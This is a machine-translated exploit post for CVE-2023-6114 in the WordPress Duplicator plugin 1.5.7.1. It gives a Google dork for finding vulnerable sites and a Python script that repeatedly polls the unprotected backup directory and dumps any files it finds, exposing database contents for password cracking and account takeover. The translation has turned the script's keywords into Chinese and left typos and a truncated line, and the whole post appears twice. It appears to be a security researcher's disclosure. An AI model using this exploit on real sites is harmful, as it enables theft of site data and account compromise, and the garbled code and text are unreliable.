#Exploit Title: WordPress插件重复器1.5.7.1-
未经身份验证的敏感数据暴露以接管帐户
#Google Dork: inurl:('插件/重复器/')
#日期: 2023-12-04
#利用作者: dmitrii ignatyev
#供应商HomePage:
#软件link: https://wordpress.org/plugins/duplicator/
#版本: 1.5.7.1
#测试在: WordPress 6.4
#CVE : CVE-2023-6114#CVE-LINK :
#cve-link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/a
目录中发现了严重的脆弱性
/wordpress/wp-content/backups-dup-lite/tmp/。这个缺陷不仅
暴露有关该网站的扩展信息,包括
配置,目录和文件,但更重要的是
在数据库中提供未经授权访问敏感数据的访问
内部的所有数据。利用这种脆弱性会带来迫在眉睫的
威胁,导致潜在的*蛮力攻击密码哈希
随后,整个系统的妥协*。
POC*:
1)有必要管理员或自动背包有效
在计划的时间自动
2)利用将每5秒发送一次文件搜索请求
3)我使用漏洞利用来攻击此网站
利用沿路径每5秒钟向服务器发送请求
“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
http://your_site/wordpress/wp-content/backups-dup-lite/tmp/'* and
它在索引中找到了一些东西,它立即解析了所有数据
并在屏幕上显示
利用(Python3):
导入请求
来自BS4进口美丽的小组
导入
进口时间
url='http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/'
processed_files=set()
def get_file_names(url):
响应=requests.get(url)
if stance.status_code==200和len(response.text)0:
汤=beautifutsoup(响应。文本,'html.parser')
links=soup.find_all('a')
file_names=[]
links:中的链接
file_name=link.get('href')
如果file_name!='./',而不是file_name.startswith('?'):
file_names.append(file_name)
返回file_names
返回[]
def get_file_content(url,file_name):
file_url=url + file_name
如果re.Search(r'\。zip(? \。| $)',file_name,re.ignorecase):
打印(f'ignoring file: {file_name}')
没有返回
file_response=requests.get(file_url)
如果file_response.status_code==200:
返回file_response.text
没有返回
而true:
file_names=get_file_names(url)
如果file_names:
打印('Page:'上的“文件名”)
对于file_name in file_names:
如果未在Processed_files:中file_name
打印(file_name)
file_content=get_file_content(url,file_name)
如果file_content不是没有:
打印('File Content:')
打印(file_content)
processed_files.add(file_name)
时间。
- -
最诚挚的问候,
dmitrii Ignatyev,穿透测试仪
未经身份验证的敏感数据暴露以接管帐户
#Google Dork: inurl:('插件/重复器/')
#日期: 2023-12-04
#利用作者: dmitrii ignatyev
#供应商HomePage:
正在加载...
duplicator.com
#版本: 1.5.7.1
#测试在: WordPress 6.4
#CVE : CVE-2023-6114#CVE-LINK :
正在加载...
wpscan.com
目录中发现了严重的脆弱性
/wordpress/wp-content/backups-dup-lite/tmp/。这个缺陷不仅
暴露有关该网站的扩展信息,包括
配置,目录和文件,但更重要的是
在数据库中提供未经授权访问敏感数据的访问
内部的所有数据。利用这种脆弱性会带来迫在眉睫的
威胁,导致潜在的*蛮力攻击密码哈希
随后,整个系统的妥协*。
POC*:
1)有必要管理员或自动背包有效
在计划的时间自动
2)利用将每5秒发送一次文件搜索请求
3)我使用漏洞利用来攻击此网站
利用沿路径每5秒钟向服务器发送请求
“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
http://your_site/wordpress/wp-content/backups-dup-lite/tmp/'* and
它在索引中找到了一些东西,它立即解析了所有数据
并在屏幕上显示
利用(Python3):
导入请求
来自BS4进口美丽的小组
导入
进口时间
url='http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/'
processed_files=set()
def get_file_names(url):
响应=requests.get(url)
if stance.status_code==200和len(response.text)0:
汤=beautifutsoup(响应。文本,'html.parser')
links=soup.find_all('a')
file_names=[]
links:中的链接
file_name=link.get('href')
如果file_name!='./',而不是file_name.startswith('?'):
file_names.append(file_name)
返回file_names
返回[]
def get_file_content(url,file_name):
file_url=url + file_name
如果re.Search(r'\。zip(? \。| $)',file_name,re.ignorecase):
打印(f'ignoring file: {file_name}')
没有返回
file_response=requests.get(file_url)
如果file_response.status_code==200:
返回file_response.text
没有返回
而true:
file_names=get_file_names(url)
如果file_names:
打印('Page:'上的“文件名”)
对于file_name in file_names:
如果未在Processed_files:中file_name
打印(file_name)
file_content=get_file_content(url,file_name)
如果file_content不是没有:
打印('File Content:')
打印(file_content)
processed_files.add(file_name)
时间。
- -
最诚挚的问候,
dmitrii Ignatyev,穿透测试仪